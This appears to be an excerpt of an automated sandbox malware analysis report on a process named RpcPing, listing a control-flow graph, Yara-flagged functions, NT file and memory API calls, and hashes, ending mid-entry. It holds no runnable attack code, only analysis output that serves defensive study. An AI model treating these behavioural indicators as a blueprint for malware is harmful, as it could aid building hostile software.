                                  control_flow_graph 164 3269b70-3269d82 165 3269d89-3269d99 164->165 165->165 166 3269d9b 165->166 167 3269da2-3269dbb 166->167 167->167 168 3269dbd-3269dc9 167->168 169 3269dee-3269df5 168->169 170 3269dcb-3269dec 168->170 171 3269dfc-3269e06 169->171 170->168 172 3269e3a-3269e43 171->172 173 3269e08-3269e27 171->173 174 326a154-326a158 172->174 175 3269e49-3269e62 172->175 176 3269e38 173->176 177 3269e29-3269e32 173->177 179 326a15a-326a177 174->179 180 326a179-326a180 174->180 175->175 178 3269e64-3269e6e 175->178 176->171 177->176 181 3269e7f-3269e88 178->181 179->174 182 326a182-326a186 180->182 183 326a1ae-326a1b8 180->183 186 3269e9a-3269ea3 181->186 187 3269e8a-3269e90 181->187 184 326a188-326a1a7 182->184 185 326a1a9 call 328a9d0 182->185 184->182 185->183 191 3269ea5-3269ebd 186->191 192 3269ebf-3269ec2 186->192 189 3269e92-3269e95 187->189 190 3269e98 187->190 189->190 190->181 191->186 194 3269ec8-3269ecc 192->194 195 3269ece-3269ef8 194->195 196 3269efa-3269f09 194->196 195->194 197 326a0b1-326a0c5 196->197 198 3269f0f-3269f16 196->198 199 326a0d6-326a0e2 197->199 200 3269f4d-3269f57 198->200 201 3269f18-3269f4b 198->201 203 326a0e4-326a0f7 199->203 204 326a0f9-326a100 199->204 202 3269f68-3269f71 200->202 201->198 205 3269f87-3269f90 202->205 206 3269f73-3269f85 202->206 203->199 208 326a122-326a126 204->208 209 326a102-326a120 204->209 211 3269f92-3269faa 205->211 212 3269fac-3269fb6 205->212 206->202 213 326a14f 208->213 214 326a128-326a14d 208->214 209->204 211->205 215 3269fc7-3269fd0 212->215 213->172 214->208 216 3269fd2-3269fdb 215->216 217 3269fdd-3269ff6 215->217 216->215 217->217 219 3269ff8-326a002 217->219 220 326a013-326a01c 219->220 221 326a033-326a03d 220->221 222 326a01e-326a031 220->222 223 326a04e-326a058 221->223 222->220 225 326a0ac 223->225 226 326a05a-326a0aa 223->226 225->174 226->223
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #T$)5$:d$<I$Av$UD$Zw$\+$^$^0$pK$s${v$!$G$y
                                  • API String ID: 0-3981489472
                                  • Opcode ID: d8376ba10eb9f3f954921727ff61b9c8ba2be121acb82a82e81e66235ba5c8e1
                                  • Instruction ID: e9d85812eaa1de5fc52c0f5be393ace220ce19c36c9db9997dbffedb5b4b2c93
                                  • Opcode Fuzzy Hash: d8376ba10eb9f3f954921727ff61b9c8ba2be121acb82a82e81e66235ba5c8e1
                                  • Instruction Fuzzy Hash: 4202BEB0D15229CBEB24CF55C894BADBBB2BF44308F1081DAD019BB281C7B95AC8CF55
                                  Function 0327C000 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0327C0E1
                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0327C11E
                                  • FindClose.KERNELBASE(?), ref: 0327C129
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 9a1c2824b1e3f800d5f83cf8e8f0986494d0a4b2d236afc5e89e7297cec4511a
                                  • Instruction ID: f2d3f33d7866e17bb98a54fd6d743334c201a08f25ce49efd49ff6d2a71893d5
                                  • Opcode Fuzzy Hash: 9a1c2824b1e3f800d5f83cf8e8f0986494d0a4b2d236afc5e89e7297cec4511a
                                  • Instruction Fuzzy Hash: B031A5759103197BEB20EB70CC85FFB777CAF45744F144568B908AB180DAB4AAD58BA0
                                  Function 032889D0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,9198DE90,?,?,?,?), ref: 03288AC5
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 4b2e54c8ebf7852719f1cd43975ab956a7cdb15fb99e5427df7e6aba1e8585d4
                                  • Instruction ID: 8a730d71f02dc939002a939968bd1fc11071b4bd4f26a38f976cb4836e915767
                                  • Opcode Fuzzy Hash: 4b2e54c8ebf7852719f1cd43975ab956a7cdb15fb99e5427df7e6aba1e8585d4
                                  • Instruction Fuzzy Hash: 5731CAB5A11248AFCB14DF98D880EDFB7B9EF8C310F504119F919A7384D770A851CBA4
                                  Function 03288B30 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,9198DE90,?,?), ref: 03288C10
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 42ac1a8bb9e7a59628d2a5915d7a7a3e9bd4519dd71691ffc4517caf9c3131b0
                                  • Instruction ID: efc56d65244a14a576ee9f031ef1c940cf3ccdef1077c6c04d5404155578b5c1
                                  • Opcode Fuzzy Hash: 42ac1a8bb9e7a59628d2a5915d7a7a3e9bd4519dd71691ffc4517caf9c3131b0
                                  • Instruction Fuzzy Hash: 7731E6B5A01208AFDB14DF99D881EEFB7B9EF88314F108119FD19A7384D770A851CBA4
                                  Function 03288E20 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(0327183E,?,0328795F,00000000,00000004,00003000,?,?,?,?,?,0328795F,0327183E,?,?,0328AD01), ref: 03288EE2
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 3353034ddccea7c1ad3847ada8403a4cf7963ddca2c4795e90b3f183136f83fd
                                  • Instruction ID: 97f9d798e9c8ff8669a4c3ad8071f106589d67ee827a0d78395f9d365922a33a
                                  • Opcode Fuzzy Hash: 3353034ddccea7c1ad3847ada8403a4cf7963ddca2c4795e90b3f183136f83fd
                                  • Instruction Fuzzy Hash: 6A214BB5A10209AFDB10EF98CC41EEFB7B9EF88310F104109FD18AB284D770A851CBA5
                                  Function 03288C20 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: da6f4e58d67c94b322fb787d705f8d761771db53247e21b67dec9d70db62689c
                                  • Instruction ID: b288d0082125f16afa98a22a7af1e183d543973198e7e7e770a5fa0418a8c189
                                  • Opcode Fuzzy Hash: da6f4e58d67c94b322fb787d705f8d761771db53247e21b67dec9d70db62689c
                                  • Instruction Fuzzy Hash: 6D11CE31A112046BD620EBA8CC41FEFB3ACDF84310F008549FA08AB284D7B17991C7A1
                                  Function 03288CC0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03288CF7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction ID: 2f6e0a5a43e8ac8ce91d9c5e321f1a20ec3143363a5f809e087c119fb3bc07ff
                                  • Opcode Fuzzy Hash: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction Fuzzy Hash: B2E0463A2103047BD220EA69DC01FDB776DDFC5624F408419FA08AB281C7B1B95186F0
                                  Function 03A54340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9981ee1fab8cfa0c42fc417f26e03ae33acaa3ec8e4ac4906847c9d0c537c614
                                  • Instruction ID: 8d6f4ea335dbdc58372420b17669fdc9825416412bd3af37fdd0f59a94875b6d
                                  • Opcode Fuzzy Hash: 9981ee1fab8cfa0c42fc417f26e03ae33acaa3ec8e4ac4906847c9d0c537c614
                                  • Instruction Fuzzy Hash: 91900271605804129140B1584C84546400D97F0301B56C012E4424554C8B188A565371
                                  Function 03A54650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: abd5154f60375b49eda202d200dd0bf880dacdf2907b42c5537c0cf45d66c577
                                  • Instruction ID: e6cbe27b2856a5eecee771b65259748264f21a8153189eb7f9e0a5a149c9e7bc
                                  • Opcode Fuzzy Hash: abd5154f60375b49eda202d200dd0bf880dacdf2907b42c5537c0cf45d66c577
                                  • Instruction Fuzzy Hash: 859002A1601504424140B1584C04406600D97F1301396C116A4554560C871C89559279
                                  Function 03A52BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: df9b1439b8267d8072b828d65d5b6964e156b791b16188e227f7c43878f62259
                                  • Instruction ID: b9c396e0e71d7bdc3eae94fb6449d56db541295db5d826bca9440ebb9de914d3
                                  • Opcode Fuzzy Hash: df9b1439b8267d8072b828d65d5b6964e156b791b16188e227f7c43878f62259
                                  • Instruction Fuzzy Hash: F090027160540C02D150B1584814746000D87E0301F56C012A4024654D87598B5576B1
                                  Function 03A52BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 99225a67788f5c1abebb45b31693800b8fd54ceedb9262691be15081833ddd45
                                  • Instruction ID: 87aa88c2bd7278d8596735e8cc4e0e5b5ccd72685a2694a391de1b2836a2ed04
                                  • Opcode Fuzzy Hash: 99225a67788f5c1abebb45b31693800b8fd54ceedb9262691be15081833ddd45
                                  • Instruction Fuzzy Hash: 9990027120544C42D140B1584804A46001D87E0305F56C012A4064694D97298E55B671
                                  Function 03A52BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 80616616de8978aadfc28515fe06c941d72cd827d5ef0ed8cbd2f160f86a9100
                                  • Instruction ID: 57a3d13c9625596cb978ab5207fc5888dadc733692f43ed983bd740528c2df26
                                  • Opcode Fuzzy Hash: 80616616de8978aadfc28515fe06c941d72cd827d5ef0ed8cbd2f160f86a9100
                                  • Instruction Fuzzy Hash: 7490027120140C02D180B158480464A000D87E1301F96C016A4025654DCB198B5977B1
                                  Function 03A52B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7537a613781fde24e05f1a9de5e752c321312bf0e8c6db59eb36b9504f8caa21
                                  • Instruction ID: bf321657539743ba03964d0433fede22c57df4b433a95d008fdffcb362711da6
                                  • Opcode Fuzzy Hash: 7537a613781fde24e05f1a9de5e752c321312bf0e8c6db59eb36b9504f8caa21
                                  • Instruction Fuzzy Hash: C89002A1202404034105B1584814616400E87F0201B56C022E5014590DC62989916135
                                  Function 03A52AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 87bec986abcb4382157eaf90aed26baae99e12e9cccaa0b81b28dc2c135ef034
                                  • Instruction ID: 849fbc98a7a91a8e55bb5074f988914697cbd3ad251af35db7655301eb2e8c11
                                  • Opcode Fuzzy Hash: 87bec986abcb4382157eaf90aed26baae99e12e9cccaa0b81b28dc2c135ef034
                                  • Instruction Fuzzy Hash: 83900265221404020145F5580A0450B044D97E6351396C016F5416590CC72589655331
                                  Function 03A52AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c29ee1e983cc1e2ed41b065a3ca44147e3d967c8974565d1caa469c64e986e5f
                                  • Instruction ID: 098a313786304e94478a64bf5a5ecbbb258a2c261502fcc649754c0f0aacbb84
                                  • Opcode Fuzzy Hash: c29ee1e983cc1e2ed41b065a3ca44147e3d967c8974565d1caa469c64e986e5f
                                  • Instruction Fuzzy Hash: C6900475311404030105F55C0F04507004FC7F5351357C033F5015550CD735CD715131
                                  Function 03A52FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 85e7d97f32826b2744f376465c05364689e2154cc6b43c01f53a9caee547ec5b
                                  • Instruction ID: 52267a7344ad09b650557a675547a0e0e4463953bd99f26d3a294feb496c100c
                                  • Opcode Fuzzy Hash: 85e7d97f32826b2744f376465c05364689e2154cc6b43c01f53a9caee547ec5b
                                  • Instruction Fuzzy Hash: 17900261601404424140B1688C44906400DABF1211756C122A4998550D865D89655675
                                  Function 03A52FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9bd0cae1c95e459c8e7b02762ab0dc4690233aab32e62ca8a037d81bb9a1883e
                                  • Instruction ID: fc67527abfad9e6aec37e4763981c29c5c2fc008a8fd1dc41fede3cee21b33b5
                                  • Opcode Fuzzy Hash: 9bd0cae1c95e459c8e7b02762ab0dc4690233aab32e62ca8a037d81bb9a1883e
                                  • Instruction Fuzzy Hash: 51900261211C0442D200B5684C14B07000D87E0303F56C116A4154554CCA1989615531
                                  Function 03A52F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 69bebf61b7d9787f00a018a65d63f84291b56d392b5fd7c85e6df58eb8552660
                                  • Instruction ID: 70026fa448261b41dc769fd917cf948f37f5853fb8f96a7f0133eb7cd906299d
                                  • Opcode Fuzzy Hash: 69bebf61b7d9787f00a018a65d63f84291b56d392b5fd7c85e6df58eb8552660
                                  • Instruction Fuzzy Hash: E49002A134140842D100B1584814B06000DC7F1301F56C016E5064554D871DCD526136
                                  Function 03A52E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: dc3c3aa253a9cf73fcb09aa79cb4c6ffec916df4ed5e3b9392932230b1f633cd
                                  • Instruction ID: f2d5188b15bc6d35bec136e6e8fd388a8de732979f4e65381c183b9dd6f1ae40
                                  • Opcode Fuzzy Hash: dc3c3aa253a9cf73fcb09aa79cb4c6ffec916df4ed5e3b9392932230b1f633cd
                                  • Instruction Fuzzy Hash: 2B90026160140902D101B1584804616000E87E0241F96C023A5024555ECB298A92A131
                                  Function 03A52EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d5eb78a134d93c402b6957db5e63ba3a9cd6001a5783dc060318e2259eab2c5e
                                  • Instruction ID: c6659036da938c47c0e9e37636ea0ed9fb50e63dc16476220e4e641ec3557d8b
                                  • Opcode Fuzzy Hash: d5eb78a134d93c402b6957db5e63ba3a9cd6001a5783dc060318e2259eab2c5e
                                  • Instruction Fuzzy Hash: 039002A120180803D140B5584C04607000D87E0302F56C012A6064555E8B2D8D516135
                                  Function 03A52DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 79a33d354e3f94defcf6b2bde2a37332eb8cc419392576a47865b02c5bd7f041
                                  • Instruction ID: 7cca148de6ca945f01b2fe2e8c085bc8644d68f94d3cfcfe464e1167c5a7f3f5
                                  • Opcode Fuzzy Hash: 79a33d354e3f94defcf6b2bde2a37332eb8cc419392576a47865b02c5bd7f041
                                  • Instruction Fuzzy Hash: 2890027120140813D111B1584904707000D87E0241F96C413A4424558D975A8A52A131
                                  Function 03A52DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d2af3806b35ad065b389dbac2d89f8e3f094731c00d033107a6b7603fa5ec3b9
                                  • Instruction ID: 7c1a45da6b10201ae486c6dd0fd4936fafb2bf2dbc013ece1919de5ff915cb9c
                                  • Opcode Fuzzy Hash: d2af3806b35ad065b389dbac2d89f8e3f094731c00d033107a6b7603fa5ec3b9
                                  • Instruction Fuzzy Hash: 18900261242445525545F1584804507400E97F0241796C013A5414950C862A9956D631
                                  Function 03A52D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 67d9b1d0b646ccff665f0c5a951933ca25b13a2f504b43b99c567d2dd6dd6ff2
